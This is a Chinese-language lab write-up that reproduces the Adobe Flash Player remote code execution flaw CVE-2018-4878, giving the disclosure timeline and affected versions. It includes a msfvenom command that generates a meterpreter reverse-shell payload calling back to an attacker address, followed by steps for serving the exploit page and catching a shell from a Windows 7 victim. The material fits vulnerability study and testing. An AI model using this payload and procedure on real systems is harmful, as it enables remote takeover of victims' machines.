menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2018-4878)Adobe Flash Player 远程代码执行漏洞 chevron_right (CVE-2018-4878)Adobe Flash Player 远程代码执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2018-4878)Adobe Flash Player 远程代码执行漏洞.md
    2.47 KB / 2021-07-15 19:47:31
        (CVE-2018-4878)Adobe Flash Player 远程代码执行漏洞
    ====================================================
    
    一、漏洞简介
    ------------
    
    2018年1月31日,韩国CERT发布公告称发现Flash
    0day漏洞的野外利用,攻击者执行针对性的攻击;2月1日Adobe发布安全公告,确认Adobe
    Flash Player 28.0.0.137
    及早期版本存在远程代码执行漏洞(CVE-2018-4878);2月2日,Cisco
    Talos团队发布了事件涉及攻击样本的简要分析;2月7日,Adobe发布了CVE-2018-4878漏洞的安全补丁。
    
    二、漏洞影响
    ------------
    
    Adobe Flash Player \<= 28.0.0.137
    
    三、复现过程
    ------------
    
    -   1.环境    kail: `192.168.184.128`    win7sp1: `192.168.184.131`    exp: `CVE-2018-4878-master.zip `    flash: `AdobeFlashPlayer28.0.0.161正式版.zip`
    -   2.利用msfvenom生成对应的shellcode代码
    
    ```{=html}
    <!-- -->
    ```
        msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.128 lport=4444 -f python>shellcode.txt
    
    ![1.png](./resource/(CVE-2018-4878)AdobeFlashPlayer远程代码执行漏洞/media/rId24.png)
    
    -   3.进入 CVE-2018-4878-master
        目录,编辑`CVE-2018-4878.py`文件,将msfvenom生成的代码覆盖掉原来的代码
    
    ![2.png](./resource/(CVE-2018-4878)AdobeFlashPlayer远程代码执行漏洞/media/rId25.png)
    
    -   4.修改 swf 文件及 html 文件位置
    
    ![3.png](./resource/(CVE-2018-4878)AdobeFlashPlayer远程代码执行漏洞/media/rId26.png)
    
    -   5.Python 执行 CVE-2018-4878-master.py 代码,会生成两个文件,一个 swf
        文件,一个 html 文件
    
    ![4.png](./resource/(CVE-2018-4878)AdobeFlashPlayer远程代码执行漏洞/media/rId27.png)
    
    -   6.把生成的两个文件放到apache web目录下
    
    ![5.png](./resource/(CVE-2018-4878)AdobeFlashPlayer远程代码执行漏洞/media/rId28.png)
    
    -   7.通过msf开启反弹sehll监听
    
    ![6.png](./resource/(CVE-2018-4878)AdobeFlashPlayer远程代码执行漏洞/media/rId29.png)
    
    -   8.靶机上win7安装存在漏洞的adobe flash player 28.0.0.126
    
    ![7.png](./resource/(CVE-2018-4878)AdobeFlashPlayer远程代码执行漏洞/media/rId30.png)
    
    -   9.通过win7自带的ie浏览器进行访问`192.168.184.128/index2.html`
    
    ![8.png](./resource/(CVE-2018-4878)AdobeFlashPlayer远程代码执行漏洞/media/rId31.png)
    
    -   10.Kail上成功获取到meterpreter shell
    
    ![9.png](./resource/(CVE-2018-4878)AdobeFlashPlayer远程代码执行漏洞/media/rId32.png)
    
    ![10.png](./resource/(CVE-2018-4878)AdobeFlashPlayer远程代码执行漏洞/media/rId33.png)
    
    
    links
    file_download